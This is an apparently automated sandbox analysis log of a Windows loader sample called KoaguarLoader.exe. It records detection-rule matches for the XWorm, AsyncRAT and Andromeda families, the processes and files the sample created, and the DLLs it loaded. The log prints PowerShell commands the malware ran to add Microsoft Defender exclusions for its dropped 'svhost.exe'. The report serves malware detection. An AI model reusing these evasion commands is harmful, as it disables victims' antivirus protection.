                        Source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000000.868675253.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: svhost.exe.0.dr, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.cs Cryptographic APIs: 'TransformFinalBlock'
                        Source: svhost.exe.0.dr, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.cs Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.cs Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.cs Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.cs Cryptographic APIs: 'TransformFinalBlock'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.cs Cryptographic APIs: 'TransformFinalBlock'
                        Source: svhost.exe.3.dr, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.cs Cryptographic APIs: 'TransformFinalBlock'
                        Source: svhost.exe.0.dr, z6XG9VNMgzKSI0w.cs Base64 encoded string: 'Ptci0funkG3c/qfIkLL4b5oLKMPLUO+N2bHrKTibmPzNTu9JyIaKk4Ykr0CdbX2s'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, z6XG9VNMgzKSI0w.cs Base64 encoded string: 'Ptci0funkG3c/qfIkLL4b5oLKMPLUO+N2bHrKTibmPzNTu9JyIaKk4Ykr0CdbX2s'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, z6XG9VNMgzKSI0w.cs Base64 encoded string: 'Ptci0funkG3c/qfIkLL4b5oLKMPLUO+N2bHrKTibmPzNTu9JyIaKk4Ykr0CdbX2s'
                        Source: svhost.exe.3.dr, z6XG9VNMgzKSI0w.cs Base64 encoded string: 'Ptci0funkG3c/qfIkLL4b5oLKMPLUO+N2bHrKTibmPzNTu9JyIaKk4Ykr0CdbX2s'
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, z6XG9VNMgzKSI0w.cs Base64 encoded string: 'Ptci0funkG3c/qfIkLL4b5oLKMPLUO+N2bHrKTibmPzNTu9JyIaKk4Ykr0CdbX2s'
                        Source: svhost.exe.0.dr, E1KFEgHGhH0nvji.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: svhost.exe.0.dr, E1KFEgHGhH0nvji.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, E1KFEgHGhH0nvji.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, E1KFEgHGhH0nvji.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, E1KFEgHGhH0nvji.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, E1KFEgHGhH0nvji.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: svhost.exe.3.dr, E1KFEgHGhH0nvji.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: svhost.exe.3.dr, E1KFEgHGhH0nvji.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, E1KFEgHGhH0nvji.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, E1KFEgHGhH0nvji.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@25/30@3/6
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe File created: C:\Program Files (x86)\samkkakieknhvpoltggsponlyggukwodzaiyyooxitakauyj\f6ef22dd-17e3-17c8-a968-f74f0764dd17
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe File created: C:\Users\user\AppData\Local\Comms\f6ef22dd-17e3-17c8-a968-f74f0764dd17
                        Source: C:\Users\user\AppData\Roaming\svhost.exe Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_03
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\WEBR_9A8P43Y2IR2Z
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeMutant created: \Sessions\1\BaseNamedObjects\yuxZVGCNWecgQM1n
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeFile created: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeJump to behavior
                        Source: KoaguarLoader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.86%
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_Processor
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_Processor
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.943416104.0000000000291000.00000040.00000001.01000000.00000009.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1079600336.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164494001.000000002CE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164642380.000000002EE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2163927611.0000000024E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164789824.0000000030E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164087789.0000000026E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164352720.000000002AE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000002984000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.943416104.0000000000291000.00000040.00000001.01000000.00000009.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1079600336.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164494001.000000002CE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164642380.000000002EE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2163927611.0000000024E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164789824.0000000030E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164087789.0000000026E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164352720.000000002AE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000002984000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2164494001.000000002CEC0000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164087789.0000000026EBF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.943416104.0000000000291000.00000040.00000001.01000000.00000009.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1079600336.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164494001.000000002CE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164642380.000000002EE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2163927611.0000000024E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164789824.0000000030E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164087789.0000000026E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164352720.000000002AE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000002984000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: KoaguarLoader.exeVirustotal: Detection: 87%
                        Source: KoaguarLoader.exeReversingLabs: Detection: 94%
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeFile read: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\KoaguarLoader.exe "C:\Users\user\Desktop\KoaguarLoader.exe"
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe "C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe"
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\svhost.exe "C:\Users\user\AppData\Local\Temp\svhost.exe"
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeProcess created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe "C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svhost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe "C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe"
                        Source: unknownProcess created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\svhost.exe "C:\Users\user\AppData\Roaming\svhost.exe"
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe "C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\svhost.exe "C:\Users\user\AppData\Local\Temp\svhost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeProcess created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svhost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: dhcpcsvc.dllJump to behavior
